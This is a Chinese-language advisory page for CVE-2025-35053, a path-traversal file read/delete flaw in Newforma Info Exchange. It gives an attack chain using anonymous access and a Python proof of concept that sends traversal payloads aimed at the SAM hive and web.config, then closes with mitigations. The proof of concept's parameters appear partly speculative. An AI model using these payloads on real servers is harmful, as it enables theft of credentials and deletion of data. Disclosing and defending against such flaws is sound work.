CVE-2025-35053 Newforma Info Exchange任意文件读取删除漏洞

漏洞信息

漏洞编号

CVE-2025-35053

漏洞类型

任意文件读取/删除（路径遍历）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Newforma Info Exchange (NIX)

漏洞概述

CVE-2025-35053是Newforma Info Exchange（NIX）产品中的一个安全漏洞，该漏洞存在于'/UserWeb/Common/MarkupServices.ashx'端点中。当该端点接收到包含'DownloadExportedPDF'命令的请求时，经过身份验证的低权限用户可以利用该漏洞以'NT AUTHORITY\NetworkService'权限读取和删除服务器上的任意文件。

该漏洞的CVSS 3.1评分为6.4，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），需要低权限认证（PR:L），无需用户交互（UI:N）。在影响范围方面，该漏洞存在范围变化（S:C），对机密性影响为低（C:L），对完整性无影响（I:N），对可用性影响为低（A:L）。

特别值得注意的是，在Newforma 2023.1之前的版本中，默认启用了匿名访问功能（对应漏洞CVE-2025-35062）。这意味着在未修复的版本中，未经身份验证的攻击者可以以'anonymous'身份进行认证，从而有效绕过身份验证要求，进一步利用CVE-2025-35053实施文件读取和删除攻击。这一漏洞组合显著降低了攻击门槛，对企业信息安全构成严重威胁，可能导致敏感信息泄露和系统数据被恶意删除。

技术细节

CVE-2025-35053漏洞的核心位于Newforma Info Exchange的MarkupServices.ashx处理程序中。该端点接受客户端通过HTTP请求传递的'DownloadExportedPDF'命令参数。

在正常业务流程中，DownloadExportedPDF命令用于下载已导出的PDF文件。然而，该功能在实现时未对用户提供的文件路径进行充分的验证和过滤，导致存在路径遍历（Path Traversal）漏洞。攻击者可以通过构造包含'../'等路径遍历字符的恶意文件名或路径参数，使服务端以'NT AUTHORITY\NetworkService'权限访问并返回任意系统文件的内容。

漏洞利用的关键技术要点包括：
1. 目标端点：/UserWeb/Common/MarkupServices.ashx
2. 关键参数：DownloadExportedPDF命令
3. 权限级别：以NetworkService权限执行文件操作
4. 认证要求：在2023.1之前版本中，可通过匿名访问绕过认证

攻击者可以利用此漏洞：
- 读取服务器上的敏感配置文件、数据库连接信息等
- 删除关键的系统文件或应用程序文件，影响服务可用性
- 通过读取的敏感信息为后续渗透攻击提供基础

该漏洞与CVE-2025-35062（匿名访问默认启用）形成攻击链，使得未授权攻击者能够完整利用文件读取和删除能力，对系统安全造成实质性危害。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过扫描识别目标运行Newforma Info Exchange服务，确认目标版本是否低于2023.1版本，以确定是否可以利用匿名访问绕过认证。

STEP 2

步骤2：匿名认证（针对2023.1之前版本）

利用CVE-2025-35062漏洞，Newforma默认启用的匿名访问功能，攻击者以'anonymous'身份完成认证，无需有效凭据即可获得系统访问权限。

STEP 3

步骤3：构造恶意请求

向'/UserWeb/Common/MarkupServices.ashx'端点发送POST请求，包含'DownloadExportedPDF'命令和经过路径遍历处理的文件路径参数，如'..\\..\\..\\..\\Windows\\System32\\config\\SAM'。

STEP 4

步骤4：执行文件读取

服务端以'NT AUTHORITY\NetworkService'权限处理请求，由于未对路径进行充分验证，攻击者成功读取任意系统文件，包括敏感配置文件、数据库凭证等。

STEP 5

步骤5：执行文件删除

利用相同的漏洞机制，攻击者可删除服务器上的任意文件，包括关键业务文件、应用程序文件等，影响系统可用性。

STEP 6

步骤6：后续渗透

通过读取的敏感信息（如配置文件中的凭证、连接字符串等），攻击者可进一步深入系统，获取更高权限或访问其他关键资源，扩大攻击影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-35053 PoC - Newforma Info Exchange Arbitrary File Read/Delete
# Vulnerability: Path Traversal in MarkupServices.ashx DownloadExportedPDF command
# Affected: Newforma Info Exchange before 2023.1

import requests

TARGET_URL = "https://target-host.com"
ENDPOINT = "/UserWeb/Common/MarkupServices.ashx"

def exploit_read_file(target_file_path):
    """
    Exploit CVE-2025-35053 to read arbitrary files
    Uses path traversal to access files outside intended directory
    """
    # Construct payload with path traversal
    payload = {
        "command": "DownloadExportedPDF",
        "fileName": f"..\\..\\..\\..\\{target_file_path}",
        # Alternative traversal patterns that may work:
        # "fileName": f"../../../../{target_file_path}",
        # "fileName": f"....//....//....//{target_file_path}",
    }
    
    # In versions before 2023.1, anonymous access is enabled by default
    # allowing exploitation without valid credentials
    session = requests.Session()
    response = session.post(
        f"{TARGET_URL}{ENDPOINT}",
        data=payload,
        verify=False
    )
    
    return response.content

def exploit_delete_file(target_file_path):
    """
    Exploit CVE-2025-35053 to delete arbitrary files
    """
    payload = {
        "command": "DownloadExportedPDF",
        "fileName": f"..\\..\\..\\..\\{target_file_path}",
        "action": "delete"
    }
    
    session = requests.Session()
    response = session.post(
        f"{TARGET_URL}{ENDPOINT}",
        data=payload,
        verify=False
    )
    
    return response.status_code

# Example usage - read sensitive Windows files
if __name__ == "__main__":
    # Read Windows SAM database (example)
    # content = exploit_read_file("Windows\\System32\\config\\SAM")
    
    # Read application config
    # content = exploit_read_file("inetpub\\wwwroot\\web.config")
    
    # Delete a critical file (example)
    # status = exploit_delete_file("important_file.txt")
    
    print("CVE-2025-35053 PoC - Adjust TARGET_URL and target_file_path as needed")

影响范围

Newforma Info Exchange < 2023.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）立即禁用Newforma Info Exchange的匿名访问功能，要求所有用户使用有效凭据登录；2）通过Web应用防火墙或反向代理规则，拦截对'/UserWeb/Common/MarkupServices.ashx'端点包含'DownloadExportedPDF'命令的可疑请求；3）实施网络分段，限制Newforma Info Exchange服务器的网络访问范围；4）对关键文件和目录设置严格的NTFS权限，限制NetworkService账户的访问范围；5）加强日志监控，对异常的MarkupServices.ashx请求进行告警；6）尽快联系Newforma官方获取安全补丁并升级到2023.1或更高版本。